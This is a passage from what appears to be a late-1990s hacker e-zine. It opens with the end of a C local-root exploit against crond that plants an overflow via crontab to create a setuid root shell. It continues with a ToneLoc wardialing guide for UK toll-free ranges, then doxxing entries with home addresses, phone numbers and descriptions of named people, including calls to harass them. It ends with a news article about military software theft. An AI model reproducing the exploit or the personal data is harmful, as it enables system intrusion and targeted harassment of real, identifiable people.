"\xd7\xff\xff\xff/tmp/xo";
long get_esp(void) {
__asm__("movl %esp,%eax");
}
void calc_bs(int *bs_ptr)
{
int len=0;
struct passwd *p_name;
/* dependant on length of username */
p_name=getpwuid(getuid());
len=strlen(p_name->pw_name);
*bs_ptr = 986 - len;
return;
}
int main(int argc, char **argv) {
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i, ofs=DEFAULT_OFFSET;
int bs=DEFAULT_BUFFER_SIZE;
FILE *fp=NULL;
/* probably will not need to give argument */
if (argc==2)
ofs=atoi(argv[1]);
calc_bs(&bs);
buff=malloc(TOTAL_BUFFER);
if(!buff) {
perror("malloc");
exit(EXIT_FAILURE);
}
ptr=buff;
memset(ptr,0x90, bs-strlen(shellcode));
ptr += bs-strlen(shellcode);
for (i=0; i<strlen(shellcode); i++)
*(ptr++) = shellcode[i];
addr_ptr = (long *)ptr;
for (i=0; i<2; i++)
*(addr_ptr++)=get_esp()-ofs;
ptr=(char *)addr_ptr;
*ptr=0;
/* create binary in /tmp to make suid shell */
fp=fopen("/tmp/xo.c","w+");
if (!fp) {
fprintf(stderr,"Can't open /tmp/xo.c for writing!");
exit(EXIT_FAILURE);
}
fprintf(fp,"#include <stdio.h>\n");
fprintf(fp,"#include <stdlib.h>\n");
fprintf(fp,"main() {\n");
fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n");
fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n");
fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n");
fprintf(fp,"}\n");
fclose(fp);
/* compile our program to create suid shell */
system("cc -o /tmp/xo /tmp/xo.c");
unlink("/tmp/xo.c");
/* now use crontab to plant overflow for crond */
fp=fopen("r00t","w+");
if (!fp) {
perror("fopen");
exit(EXIT_FAILURE);
}
fprintf(fp,"%s\n",buff);
fclose(fp);
/* put our r00t crontab in crontabs directory */
system("/usr/bin/crontab r00t");
unlink("r00t");
/* helpful reminder */
printf("Now wait about 1 minute and look\n");
printf("for the suid shell -> /tmp/XxX\n");
exit(0);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. KDE klock local exploit : someone on bugtraq
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
..included in kde.gz with this crh009.zip
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Wardialing in the UK : Jf
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Wardialing in the UK, for me, is a very interesting subject. Although a lot of
the modern c0de kiddies consider it "old-sk00l" and see it as no use today,
Wardialing is actually, in my opinion, one of the greatest Hacking related
things to do. Hacking a Webpage is fun yes but an isolated carrier provides
much more entertainment and excitement, and via wardialing we aim to find
these carriers along with lots of other cool things which will provide the
phun.
All the time, I am approached and people ask me HOW TO wardial in the UK,
I always tell people its the same as in the UK, but people act so confused
about the whole idea of UK Wardialing. Basically the little Windoze kiddies
see some old wardialer, try it out and find that the area code to enter is only
allowed to be up to 3 numbers long, therefore a US area code, with this they
panic and cry out for help. Or they download a version of ToneLoc and PANIC
because they do not understand the program, which CAN be used for UK
wardialing and its the one I always use. This is where this help file is
intended to come in useful, it will guide you through the basics of wardialing
in the UK, and what you will find on your journey and it will also guide you
with using Toneloc succesfully to scan loads of numbers and gain interesting
results infinding carriers, VMBs, PBXs and numerous other interesting things.
##############
Where to start
##############
Wardialing is the process of scanning a large range of numbers and finding
interesting things, as I have already stated. There are literally thousands
of Carrier Tones in England which all perform different tasks and are owned
by different companies.
For example -
Banks (yes BANKS, hehe),
Libraries (delete those excess fines)
Local Government (piss off your council)
..and loads more big companies and organisations.
It may sound like a little movie-style picture of hacking (WARGAMES comes to
mind) but its REAL, it does exist and people do mess with this sort of thing,
hehe. Certain Carrier tones can also be abused and be setup so that you can
connect perfectly to the Internet which will result, if the carrier is located
within a FREE CALL netw0rks, in an 0800 dialup.
People tend to mainly wardial for carrier tones but VMBs and PBXs can be found
by Wardialing as well, so wardialing provides a great use for Phreaks who are
interestedin these things. Although I personally haven't found an PBX while
wardialing for about 6 months but, someone, somewhere will no doubt be finding
one and abusing one as I type. VMBs are common findings while wardialing,
especially on FREE CALL netw0rks and I have great phun with these.
The 0800/0500 Service Network numbers, which are of course FREE, are the best
place to start wardialing due to the LARGE percentage of businesses who have
carriers located on them, to transfer data from area to area at low cost
(only rental of number). It is also a lot safer to wardial than normal area
codes because you will not be dialing peoples houses, so you can dial 0800/0500
numbers at night and not be waking people up (not that I care, its just that
they might report the wardialing call to BT as a nuisance call).
If you like the idea of Blueboxing then the 0800 89 **** number block will
interest you. As you may already know, this block of numbers act as the
COUNTRY DIRECT numbers, with some being boxable. From wardialing you will be
able to note which ones are boxable if you listen into the wardialing progress,
as boxable numbers (CCITT5 Lines) will give a little series of bleeps when they
pickup, these are instantly recognisable and if you here this you will know that
it is boxable.
Well thats a basic introduction into the uses of Wardialing in the UK, so how
bout it? Are you ready to step into this world? This is the real deal and could
land you in a lot more trouble than a webpage hack, no doubt most people reading
this will have already delved into wardialing as it is nothing new but some
newbies to the subject might be a little misguided about the whole wardialing
deal...
#######
ToneLoc
#######
Yes, This is the wardialer that I recommend for wardialing in the UK, it is
however one of the mose complicated to understand if you have never used it
before, but this section will explain how to use ToneLoc to its full
capabilities and get scanning straight away. A download URL for ToneLoc is
provided in the *URLs* section of this paper.
Right, lets get started...We will keep the example simple by using the same
variables throughout this section. When you are actually doing your own
wardialing you will of course need to change these variables. People who have
read the ToneLoc User Docs may find some of this familiar but some people DO
NOT realise that the examples in the user docs CAN be interpreted into UK use.
For this papers example we are going to scan the 0800 666 *** range which will
provide us with 100 results. It is easy to make this scan A LOT bigger but
for times sake we are going to look at this example now.
Now we have discussed the variables of this example we can get down to using
ToneLoc.
First of all you need to restart your computer in DOS m0de and enter the
ToneLoc directory. The First thing you need to do is to set the CONFIGURATION
SETTINGS to what you require. So, open TLCFG.EXE and you will see 6 menus at
the top of the screen.
The *FILES* menu is used to change any log files that are used in the program.
You can edit the names of these log files from this menu but its easiest to
keep the names the same, from this menu you can easily see what the function of
each .log file is.
The *MODEM STRINGS* menu is used to setup the modem sequence for dialing etc.
Here is where you need to enter your dialing prefix (0800) so that the program
understands our range.
The *MODEM OPTIONS* menu is for your modem settings such as Com Port, Baud Rate,
IRQ etc. I would recommend setting your baud rate at 19200 even if you have a
faster modem, the program (due to being 4 yrs old) doesn't seem to like any
baud rate above 19200.
The *SCAN OPTIONS* are the options which you may want to change which affect
what it happening during the scan. eg. Sound, Wait Delay etc. I would recommend
the Wait Delay being quite small to make the scan run faster but remember to
keep it long enough for lines to pickup and for ToneLoc to register whether
the line is a carrier, PBX, VMB, or Normal Line.
The *COLORS* menu is just for editing the colors of the program. Nothing major
to worry about.
And finally, the *QUIT* menu is where you can chose to save or abort changes
made to the configuration file.
If you have looked through all those menus you will see that there is a lot of
different things that you can change and play with and by now, you should know
which ones to change to suit your UK Wardialing needs.
Now that you should have all the configuration of ToneLoc setup SPECIFICALLY
for your scanning needs we can get down to some major wardialing. If it is your
first time using ToneLoc you will need to just open TONELOC.EXE and read the
stuff it brings up.
As you can probably see, there are LOTS of parameters within ToneLoc that can
be used when scanning. ToneLoc allows for a lot of user choice which is
something that attracts me to using it. For example, you can easily program
the number range to scan and the number range to exclude from the scan by just
selecting a different parameter.
To scan a range of numbers in the 0800 prefix - eg. 0800-666-100 <-->
0800-666-200 the command at the DOS prompt would be :-
TONELOC 666-XXX /R:100-200
This would then scan all the numbers between 0800-666-100 and 0800-666-200 and
log the results into the log files specified in the *FILES* configuration menu.
This is the option I use the most and its the parameter I recommend you get to
know well.
Next, suppose you want to scan all the numbers between 0800-666-000 and
0800-666-999, but you had already scanned the 0800-666-100/200 section in your
last scan. This is where the EXCLUDE parameter comes into use.
TONELOC 666-XXX /D:100-200
This would result in you scanning all numbers 0800-666-000 <--> 0800-666-999
Excluding 0800-666-100 <--> 0800-666-200
If you look at the ToneLoc User Guide included in the tl110.zip you will see
this explained as well as lots of other ways to scan.
Another Favourite of mine is to use the following command line.
TONELOC 666-XXX
This will scan 0800-666-000 <---> 0800-666-999 and it will save the results to
the data file 666-XXX.dat. You must always remember to have the correct
variables added into the Configuration program.
Now that you know the basic and most used parameters of ToneLoc its time to get
Wardialing.
If you watch a wardialing session you will see that it seperatly dials each
number and tells you whats happening on screen. It will tell you when it finds
anything interesting such as a *gasp* Tone, a Carrier or a Voice and it also
appends the results to the log file so you can remember the numbers of
interesting stuff and go back and play with them later.
You must remember that the fun does not end at Wardialing, a lot of people
find wardialing and scanning boring, but I find it one of the more interesting
parts of Hacking/Phreaking as you never know when your going to be lucky enough
to jump upon a neat carrier (for a bank, hehe), a PBX or a VMB, the fun starts
here. You need to follow all your wardialing findings up and learn how to use
what you have found in a way which benefits you, after all isn't that the aim?
####
URLs
####
Below are the necessary URLs to download ToneLoc and maybe find out more
information about Wardialing in general.
First of all you will NEED a copy of ToneLoc (the wardialer I am recommending)
http://www.linenoise.org/philez/wardialers/tl110.zip
Now that you have started Wardialing in the UK, how about sharing some of your
findings or finding people who may help you on your quests and related projects.
The Linenoise WWWBoard is a place for this to come to life.
http://www.linenoise.org/wwwboard/
###
End
###
Well, thats all the Information that you need to get you going with Wardialing
in the UK and using ToneLoc successfully, just be careful and remember that
you're responsible if you fuck up, you cannot blame me, the teacher is not to
blame. In the near future I would like to c0de a Wardialer specifically for the
UK, which would be easy to use, understand and gain successful results from.
It is a project that I always keep on the back burner but if enough people
wanted to see it, I might bring it foward, let me know...
Jf_
<JF@linenoise.org>
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. p0sse.rolodex (mad outdated anyway) : juurigaveitout
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Alan Wilson (aka. "w1ng")
58 Moon Drive 215-305-8379 <pager>
Morrisville, PA 19069 215-736-1863 <voice>
Drexel University 215-752-1324 <SCC for his 5E>
wing@dunx1.ocs.drexel.edu
Known Sites: *.drexel.edu, *.rutgers.edu, *.delphi.com.
Short brown hair, brown eyes. Approximately 5'10 130 pounds.
Very scrawny appearence. Roughly 19 to 20 years old. Commutes
to Drexel University from his home in Morrisville. Computer
Science major. Works part time doing Data-Entry. Egomaniacle,
novice UNIX experience, short-tempered, hostile and arrogant.
Logs:
[dunx1.ocs.drexel.edu]
Login name: wing In real life: Wong Ing
Directory: /home/dunx1/under/wing Shell: /bin/sh
Last login Fri Feb 25 19:21 on ttyqf from gandalf.rutgers.edu
New mail received Sat Feb 26 12:00:09 1994;
unread since Fri Feb 25 19:27:18 1994
No Plan.
______
Don Neumann (aka. "peaboy", "speedin")
7340 Hayward Drive 216-656-1912 <voice>
Chardon, Ohio 216-650-5181 <data>
Known Sites: *.DELPHI.COM, *.MsState.edu, *.wustl.edu
16-17 years of age. Dropped out of his local High School his Senior
year. Works part time as a desk clerk at a local motel. He is not
attending a college, and presumably has no GED.
_____
Steven Dake (aka. "riley" "renegade bit head" "rbh")
1731 North Fairway
Flagstaff, Arizona 86011 602-526-9184 <home>
North Arizona University (NAU.EDU)
Email unknown.
Known Sites: herbon.connected.com, *.NAU.EDU, *.CS.UTC.EDU,
ballison.extern.ucsd.edu, *.caltech.edu.
Appearance unknown. Approximately 20-23 years of age. Computer
Science major, second of third year. He lives on campus in the
dormitories. His parents reside at the North Fairway address.
He often comes out of UTC.EDU and CONNECTED.COM.,
_____
Greg Perry (aka. "z00m" "digital hitler" "j00" "gary" "Gary Seven")
Known Sites: *.cftnet.com
_____
Lane Davis Jr. (aka. "merc")
Phoenix, Arizona 602- <home> <unlisted>
Known Sites: NAU.EDU, indirect.com, internet.com,
_____
(aka. "Sciz")
Known Sites: *.drexel.edu
6'10 155, very scrawny. Short permed blonde hair, blue or green eyes.
Freshman or Sophomore at Drexel University. Lives in a dormitory on
campus. Good friends with Alan Wilson. He rides an unregistered Honda
Motorcycle.
_____
Scott (aka. "X")
Known Sites: CAPELLA.CS.UTC.EDU, HOBBES.CS.UTC.EDU, EXPLORER.CS.UTC.EDU.
Email: X@capella.cs.utc.edu
He attends and apparently administers part(s) of the CS.UTC.EDU school
and domain. He has Brown hair, small build, 5'9" tall, about 155 pounds,
brown eyes.
_____
Chris Fisher (aka. "y", "Y-W1nD0z3")
Known Sites: uahcs2.cs.uah.edu, grendel.cs.uah.edu, tycho.cs.uah.edu
Email: cfisher@uahcs2.cs.uah.edu
Very egomaniacle. Known for harassing CERT in news groups:
] X-News: uqvax comp.security.unix:4675
] From: crfisher@nyx10.cs.du.edu (I am being repressed.)
] Subject:Cert; my what a witty bunch.
] Date: Mon, 11 Apr 94 19:52:33 GMT
] Message-ID:<1994Apr11.195233.17351@mnemosyne.cs.du.edu>
]
] Once again cert proves what a great bunch of guys they are. I guess they had
] never heard of gnufinger before...isn't it amazing that some people still
] respect them?
Logs:
*** irc.netsys.com : Thursday April 21 1994 -- 22:30 -07:00
*** y is root@deimos.cs.uah.edu (root)
*** on channels: #tacobell @#fedz @#lifesux
*** on irc via server irc.math.ufl.edu (The Happiest Server on IRC)
_____
Oliver Friedrichs (aka. ][ceman)
Known Sites: bova.cc.umanitoba.ca
Email: umfriedr@bova.cc.umanitoba.ca
He is Canada local, he dials into "umfriedr.dial.umantobia.ca" and from
there likes his accounts at various machines in the cc.umanitoba.ca domain.
_____
(aka. "N0-D0Z3")
Known Hacked Sites: stdkrl@pip.shsu.edu
This guy is a mystery. He is very malicious. He has apparently hacked
all sorts of a long list of sites. He is currently (940421) on the
"west coast" but is moving to Pittsburg next month.
Logs:
*** irc.netsys.com : Thursday April 21 1994 -- 18:30 -07:00
*** X is ~X@CAPELLA.CS.UTC.EDU (X)
*** on channels: #tacobell
*** on irc via server Copper.Ucs.Indiana.Edu ([129.79.1.4] Indiana
+Experimental ALPHA AXP Server)
*** N0-D0Z3 is stdkrl@pip.shsu.edu (KATRINA RUTH LOUNSBERRY)
*** on channels: #tacobell
*** on irc via server irc-2.mit.edu (Mass. Institute of Technology, Cambridge,
+MA, USA)
<N0-D0Z3> well, u guyz missed alot.. I came about this: --><-- close to
+getting my ass busted... I sorta did get busted actually..
<N0-D0Z3> I fuckin broke into the high school where I lived and stole some
+kewl shit... they found out it was me some how, and I split.
<N0-D0Z3> they got my picture plastered all over where I used to live.. fuck
+wantedand all that shit.. ehehe.. oh well.. I still got me a 386DX-40 out of
+it.
<N0-D0Z3> I took two full machines(cases) and one monitor.
<N0-D0Z3> X:I went the first night and got two machines.. full cases etc, one
+monitor and a keyboard...
<N0-D0Z3> I went back not the next night, but the night after, and got all the
+processors, the 1 gig HDD's from the two servers, novell netware boxed set,
+and then a camcorder and cd-rom from the library..
<N0-D0Z3> I came back to my house at about 3:00 am and my mom was home, so I
+fucking hid the shit behind the apartments and went to my friends who went
+with me and slept at his house, and when I went home the next day, suprise,
+it was all gone.
*** irc.netsys.com : Thursday April 21 1994 -- 18:31 -07:00
_____
(aka. "Dynastar")
He attends Carnegie Mellon University studying Mathematics (applying
for CS major there). He is very fluent in 8051 Assembly (motorola)
and is a major Cellular Phone modification jockey. He is probably
one of the best at this, and his Cellular mod for th
He is one of these people:
[unix6.andrew.cmu.edu]
dsa3 David Reeve Sward *p1 Thu 15:15
jl6b Jesse L. Liu p2 Thu 16:56
jc7o Joo C. Chung p3 Thu 21:20
jmdk Jason C Miller p4 Thu 18:42
mh5u Mathew Henson pb Thu 21:47
_____
Evan Baker (aka. "Nightstriker") voice: +1 301 390 1097
High School Student
Lives close to the campus of University of Maryland
College Park.
Big UMD.EDU and GMU.EDU hacker. Past relations with various "posse"
members.
_____
(aka. "Vaxbuster")
This may not be his real name, but this is the account he uses
every time.
[unixd3.cis.pitt.edu]
Login name: cxzst1 In real life: Cheng Zhao
Directory: /afs/pitt.edu/usr66/cxzst1 Shell: /bin/bash
Address mail to: cxzst1+@pitt.edu
Affiliation: Universal Student Computing [Provost]
Account used on Wed Apr 20 16:23 (1 day 9 hours ago).
No new mail; last read Tue Apr 5 23:34 (16 days ago).
Plan:
Home Phone : 291-6799
_____
Louis (aka. "Clovis")
Known accounts: afo3cmm@cabell.vcu.edu
DC/VA/MD Local. Attends 2600 meetings regularly. Very blonde
hair, blue eyes. About 5'11 inches, dresses funny, about
130-135 pounds. Not attending school currently.
_____
<DELETED LINE FROM ORIGINAL, CONTACT JASON@TEXTFILES.COM FOR FILE>
_____
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. RLoxley, first class fuckwit (and fatboy) : WH0 GN0Z?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
There is a user on the Undernet IRC network called "RLoxley", he is a lame fuq,
he is also very fat, a compulsive liar, and child abuser..
He even moved house because of the abuse he was getting because of the way he
treats his two daughters (RLoxley is around 40 btw).
These are his old d0x from the 0wned.rolodex :
Handles : RLoxley, RLox1ey, op in #hackphreak on UnderNet.
Name : Kent Browne
Phone : (914) 628-6281
Address : 29 Mcgregor Drive
Mahopac, NY 10541
-
E-Mail : mageus@bestweb.net
-
Wife's Name : Colleen Browne
-
Other Family : Two daughters, one aged 6,
the other is 2 months old,
RLoxley abuses them on a daily basis..
If anyone socially engineers the people living at his old address for his
new mailing address and even a phone number, we will be mad impressed.
Here is an IRC log of so1o making RLoxley look like a fag.. (Malaka == RLoxley)
*** savec0re (~savec0re@zphn1-p107.worldonline.nl) has left #rhino9
<o1os> heh
<o1os> i just did something neat in #hackphreak
<o1os> heh
*** o1os is now known as os1o
*** os1o is now known as savec0re
*** Malaka (mageus@x2-7.katonah.bestweb.net) has joined #rhino9
<Malaka> where did pussy boy go?
<savec0re> *** so1o has quit IRC
<savec0re> ?
<savec0re> you mean so1o rlox?
<Malaka> yes, he is a wimp
*** Malaka is now known as RLox1ey
<savec0re> bbl
<RLox1ey> [13:57] <o1os> "RLoxley is looking for nominations on his new friends, please call 1-800-fagchat now and cast your vote"
<RLox1ey> now that he cant find me any more
<RLox1ey> this is what he resorts to
* su1d is away, auto-gone [tv/l]
*** chameleon (333@cx640648-a.msnv1.occa.home.com) has joined #rhino9
*** SyndIcate sets mode: +o chameleon
*** chameleon sets mode: +o savec0re
*** savec0re is now known as so1o
*** so1o sets mode: +b *!*@x2-7.katonah.bestweb.net
*** RLox1ey was kicked by so1o (he0ahe0ahah0aha)
<so1o> HAHAHAHAHAHHAHAA
<so1o> WHAT A LAME FUQ
Anyway, someone pull his new d0x.. mail them to tk85@hotmail.com or /msg so1o
on any IRC network..
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Carolyn Meinel d0x : savec0re
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Carolyn Meinel, unless you didn't already know, runs the happyhacker mailing
list for lame fuqz with no sk1llz, she herself however, also has no sk1llz,
and so is classified by the el8 board of classification is a LAME FUQ.
Phone her up and abuse her today..
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
(505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. MOD break DISN : Wired News
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In what may be one of the first demonstrations of
the potential of cyber warfare, an international
cracking group claims it has stolen a suite of
programs used to run classified US military
networks and satellites.
The group, calling itself Masters of Downloading,
or MOD, said in a statement that it had stolen the
software -- the Defense Information Systems
Network Equipment Manager (DEM) -- from the
Defense Information Systems Agency, the branch
of the Defense Department in charge of classified
computer networks.
"This may help you to realize the reality of the
threat of information warfare against the United
States of America, as well as the DEM software's
obvious value to certain global organizations and
individuals," said the statement, which was
supplied to Wired News by an anonymous
representative of the group.
The statement detailed the capabilities of the DEM
software, and was accompanied by a number of
image files that depicted the program's interfaces.
The software's authenticity was confirmed by John
Vranesevich of the computer security site
AntiOnline. Vranesevich said he obtained a copy
from MOD last Thursday and tested it after first
unplugging his computer from the Internet.
Vranesevich, who has tracked the computer
underground for five years, said that the theft of a
classified network control program pointed to a
threat far more serious than the routine Web
server intrusions of recent months.
"This is one of the first times we've seen a group of
hackers whose goal was not to commit acts of
Internet graffiti by defacing low-security Web
pages, but [instead] to actually target, plan, and
retrieve software suites designed for military use,"
said Vranesevich.
Last month, Vranesevich was the first to interview
Ehud Tenebaum, the Israeli teen at the center of a
federal investigation into widespread attacks on
US military computer systems. But those attacks
pale in comparison, he says.
"[The deliberate theft of classified software] puts
this group on a whole other playing field," said
Vranesevich, who added that the group is
comprised of 15 individuals, including eight
Americans, five Britons, and two Russians. The
group is not affiliated with Tenebaum, known as
the Analyzer.
MOD said that the software is used to remotely
monitor and manage military computer-related
equipment, including routers, repeaters, switches,
military communication networks, and GPS
satellites and receivers. The suite's top-level
interface is designed to "manage all the
computer-related equipment used by the United
States military," the statement read.
With the DEM software, the group claims, the
entire Defense Information Systems Network could
be shut down for a period of time. "This is
definitely not a good thing for the United States
military, as they depend heavily on their computer
systems and networks to quickly share data and
information from anywhere in the world," the
statement said.
MOD went into detail over two particular software
components, one of which allows a user with
access to monitor or shut down T1 links used by
the military. The other program concerns Global
Positioning System satellites, which are used to
establish precise coordinates for weapons
targeting and the navigation of commercial aircraft.
"Although the DEM software cannot be used to
send data to the GPS satellites, it can be used to
track the satellites and pinpoint their exact
whereabouts, as well as the frequency ranges
they use and other operational information," said
the MOD statement.
MOD claims it first obtained the software in
October 1997 but did nothing with it at first, to be
sure that they were not being tracked.
Although the Defense Information Systems
Agency public affairs office declined to comment,
a mission statement on the agency's Web site
clarifies its role within the Department of Defense:
"DISA will be the preeminent provider of
information systems delivery support to our
warfighters and others as required by the DoD,
under all conditions of Peace and War."
MOD members were not immediately available for
comment, either, but in an interview with
Vranesevich last Friday, group members said their
intentions were not hostile.
"We have the power to do so, but at this time we
have no intentions to launch such a [network]
attack," a member told Vranesevich. Another
member also told Vranesevich that he had
obtained a separate piece of software used to
communicate with submarines.
Gene Spafford, director of the Computer Security
Research Center, COAST, said that the intrusion,
if true, didn't surprise him.
"I don't think anyone who is familiar with
government security has ever believed it to be as
secure as claimed," Spafford said.
Spafford added that he was not familiar with DISA
systems, but that any distributed system is
vulnerable, and that many government systems
are configured "for convenience and not need."
The group claimed that they stole the software
from a Windows NT server at DISA, and that about
30 individuals worldwide presently have copies.
"When you have a system that is distributed such
that others can manipulate it, you open it up to not
just security problems but also erroneous
operations," Spafford said. "[You get] people who
don't have training and [you get] accidents. It is a
standard systems design question."
In an interview with Vranesevich, the group offered
some network security advice for the US
government.
"It's simple: take all [classified] military systems
off the Internet, place only [unclassified] Web
servers on the Internet [and] keep the rest on a
purely internal network," the MOD member said.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_ /| k0dek4t sez...
\'o O'
=(_o_)= "EyEm HuNGaRy FoR SKiLLz,
U nOt CaTf00d!!#@"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
r00td0wn r00tsux r00tsick m00ksr00t fr00tl00ps r00tyt00ty vr00mvr00m r00tg0b00m
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
